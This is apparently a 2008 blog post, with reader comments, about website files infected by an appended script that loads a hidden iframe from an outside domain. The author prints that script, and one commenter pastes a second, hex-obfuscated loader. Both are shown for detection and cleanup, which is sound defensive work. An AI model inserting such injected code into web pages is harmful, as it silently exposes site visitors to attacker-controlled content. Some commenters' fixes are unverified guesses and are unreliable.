Just discovered this by accident. My server files have been infected with a piece of javascript code that sends the information to a certain site. This is certainly a first.
How can you check this?
The virus attacks following files on your server:
- index.php
- index.html
- main.php
- header.php
- footer.php
At the end of these files it will insert the following code:
<script language=javascript>status=location;document.write (’<iframe src=”hххp://online-channels.info/in.cgi?traf” width=0
height=0 frameborder=0 display:none onLoad=”status=defaultStatus;”></iframe>’);</script>
Update: if you use WordPress read how to check WordPress sites.
What it does?
I can only guess. The code is calling a script on online-channels.info site. It can be sending traffic information. Maybe it is a first case of Internet marketing espionage? Or it can be trying to run some malicious code.
How did it come here?
It can be a security flaw on my hosting server. It can be a security flaw of the WordPress which is the main script I run on my server.
Whatever way it came, it executed code that scanned through all the files on my server that match the given names and added that code at the end.
All created files carry the time stamp 29-06-2008 04:59 which is the time when the attack occurred.
How did I discover it?
By accident. I was looking at the HTTP requests on my site using Firebug. I noticed few 404 Object not found errors. Normally I keep my blog in good shape and these things should not happen.
I then suspected that some of the plugins I use reference this site. After inspection I could find the script inserted to a number of plugins.
I have then checked my theme - it was there too in the index, header and footer. I then checked the whole WordPress installation - the script was there.
Finally I discovered it was spread out on my whole server.
The lucky thing is the attacker’s site broke down so I could find an anomaly with that 404 error.
Who is behind it?
I am still not sure. Here is the domain registration record for online-channels.info
Domain ID:D23976304-LRMS
Domain Name:ONLINE-CHANNELS.INFO
Created On:29-Feb-2008 23:08:51 UTC
Last Updated On:22-Jun-2008 11:24:52 UTC
Expiration Date:28-Feb-2009 23:08:51 UTC
Sponsoring Registrar:Blog.com Digital Communications Inc. (R315-LRMS)
Status:OK
Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Street1:P.O. Box 97
Registrant Street2:Note - All Postal Mails Rejected, visit Privacyprotect.org
Registrant Street3:
Registrant City:Moergestel
Registrant State/Province:
Registrant Postal Code:5066 ZH
Registrant Country:NL
Registrant Phone:+45.36946676
The site is registered somewhere in Denmark under an anonymous name. Blog.com is mentioned as Sponsoring Registrar.
The server IP is 78.109.22.246 and is located in Ukraine.
Trace route finishes before getting to the site:
11 86 ms 83 ms 83 ms tr1-v23.de-fra.datagroup.ua [217.28.250.42]
12 114 ms 107 ms 107 ms tr1-v454.ua-kiev.datagroup.ua [80.91.160.205]
13 691 ms 611 ms 131 ms cat65-ge1-2-datagroup.hosting.ua [194.54.91.130]
14 * * * Request timed out.
What can I do?
You should check the files on your server for the code. Check index.php and index.html first as they are most likely to have been infected.
Warn your friends about it.
Loading ...
September 18th, 2008 at 19:57
Hi Im lost I have a few questions is there anybody I can email my questions to one-to-one?
Thank you for your time.
Ter
September 15th, 2008 at 19:18
not working…
http://dhost.info/hasan
September 15th, 2008 at 18:33
Well, some pages worked but when I went to HOME - several times,(http://www.prelovac.com/vladimir/) this is what I’ve got (no joke)! Or you think I’m fooling you around?!
September 15th, 2008 at 15:07
How did you write that comment then?
September 15th, 2008 at 14:27
Oops… where is the hyperlink to the image? Never mind, it’s here:
http://i281.photobucket.com/al.....screen.jpg
September 15th, 2008 at 14:25
It seems that you still have some problems?! Look what I’ve got when browsing your website:
July 25th, 2008 at 6:14
thanks for the information.
hope this help in my problem…
My Site, got infected with (Exploit.HTML.Iframe.FileDownload)
How to Identify the file that beeb infected. in my site, the index.html are 3 in separate folder.
July 24th, 2008 at 6:41
Okay wanted to add this.
I noticed that the injection infects the main folder of the server. and goes one directory deep to infect another file.
/index.html
and
foldername/index.html
but wont go deeper than that. Good for me since many folders have indexes in deep folders.
I plan on in the future to not have index files in the first sub folder if this keeps up.
What hosting provider do you all use?
July 24th, 2008 at 6:30
I noticed on my 2 servers both hosted on godaddy. That all my files titles Index.php or html, main, login have all been effected by a code injection. To compare notes here is what mine reads..
I removed script start and end from the copy and paste.
I hope this helps someone outthere. Oh 1 server runs Joomla on it. The other on Hml and Php scripts.
function xy1q48773ca845b80(q48773ca846354){ function q48773ca846b1f () {var q48773ca8472ee=16; return q48773ca8472ee;} return (parseInt(q48773ca846354,q48773ca846b1f()));}function q48773ca847abe(q48773ca8484a8){ var q48773ca8499fc=2; var q48773ca848a5e=”;q48773ca84a99e=String.fromCharCode;for(q48773ca84922d=0;q48773ca84922d<q48773ca8484a8.length;q48773ca84922d+=q48773ca8499fc){ q48773ca848a5e+=(q48773ca84a99e(xy1q48773ca845b80(q48773ca8484a8.substr(q48773ca84922d,q48773ca8499fc))));}return q48773ca848a5e;} var q48773ca84b16e=’3C7363726970743E696628216D796961297B646F63756D656E742E777269746528756E657363617065282027253363253639253636253732253631253664253635253230253733253732253633253364253237253638253734253734253730253361253266253266253734253732253735253635253732253639253665253637253734253666253665253635253733253265253665253635253734253266253733253635253631253732253633253638253265253633253637253639253366253632253631253631253637253639253732253663262532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533362533332533362533392532392532622532372533322533302532372532302537372536392536342537342536382533642533312533312532302536382536352536392536372536382537342533642533352533372533392532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E’;document.write(q48773ca847abe(q48773ca84b16e));
July 21st, 2008 at 23:30
Using the .htm suffix instead of .html does not stop anything.
July 21st, 2008 at 18:38
i’m seeing this on a joomla site
July 19th, 2008 at 4:37
I maintain my business website and have a similar virus. I use a commercial host who denies any virus on my website.
Nearly all of the index.html and index.php have the added code. The code is different from the one shown here. This code has a long string of numbers in it.
I would like to ask if anyone has had success using just the index.htm ?
I am going to replace some of my index files with that extension since some files I cleaned and replaced online were reinfected.
Thanks, for all the information put on this page.
I may let you know if changing the html to htm works.
July 17th, 2008 at 1:28
Dave (The Other One) - love that redirect and I totally agree that they need what that page is offering!!
July 15th, 2008 at 16:38
Hi, Thanks for the info. I would like to contribute info regarding the Regisrar - Blog.com.
Allmost all new .info domains with Directi(ResellerClub) shows the Sponsoring Registrar as Blog.com.
I have blogged on my site on this if interested. http://indika.info/2008/07/15/.....o-blogcom/
July 11th, 2008 at 16:58
I have Wordpress 2.5.1 installed. I tried replacing the index files (in root,wp-admin, and deleted all of my themes in wp-content and recreate them new) and that seems to be doing the trick…
Until this morning it came back again. All the index.php files has been injected again with the script so I will have to do the same thing. Is there anyway to prevent some modifications done on the index.php files? I changed the permission to those files to 644, but I”m not sure if this is going to fix it permanently.
July 11th, 2008 at 7:08
is this website (www.priceclub.ae ) infected by virus…?
please ensure me that website infected by virus or not…
pleaseeeeeeeee.
thanks,
DHrub
July 11th, 2008 at 1:03
Removing them from the files is what I did, nothing much left I am afraid expect from contacting your hosting company and warning them. Also make sure you upgrade everything to latest versions (WordPress especially).
July 10th, 2008 at 21:37
Hi there, I stumbled upon your site from googling. It seems my website also was injected by these files, although so far I only found them in the 3 index.php files located in the Wordpress directory.
I was wondering what I should do in this case. If I downloaded those 3 index.php files and remove the scripts, upload them back, will it actually solve the problem because I’ve been looking around and it seems they got injected back within a day. I also wanted to change the password on all my account, but I dont know if that is going to solve anything.
Any of you have any ideas? Thanks for the heads up definitely.